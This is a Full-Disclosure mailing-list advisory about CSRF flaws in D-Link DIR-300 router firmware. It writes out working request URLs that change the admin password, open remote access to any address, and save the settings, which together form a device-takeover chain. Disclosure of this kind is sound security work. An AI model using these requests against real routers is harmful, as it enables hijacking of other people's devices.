lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 13 Jul 2018 23:52:42 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] CSRF vulnerabilities in D-Link DIR-300

Hello list!

There are new Cross-Site Request Forgery vulnerabilities in D-Link DIR-300.
After my previous advisory.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DIR-300NRUB5, Firmware 1.2.94. All
previous versions also must be vulnerable.

----------
Details:
----------

After previous AoF, BF and CSRF vulnerabilities, here is new Cross-Site
Request Forgery holes. To take control over device it's needed to make few
CSRF requests: change admin's password, login is fixed (this is earlier
mentioned AoF vulnerability), turn on remote access and save settings.

Cross-Site Request Forgery (WASC-09):

Change admin's password:

http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

Add settings to turn on remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1

Change current settings to turn on remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1

Delete settings of remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1

Save all changes in settings of device:

http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y

------------
Timeline:
------------

2016.03.17 - announced at my site about vulnerabilities in DIR-300.
2016.08.27 - disclosed at my site previous advisory about DIR-300.
2017.09.30 - disclosed this advisory (http://websecurity.com.ua/8165/).
2014-2018 - informed developers about multiple vulnerabilities in this and
other D-Link devices.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ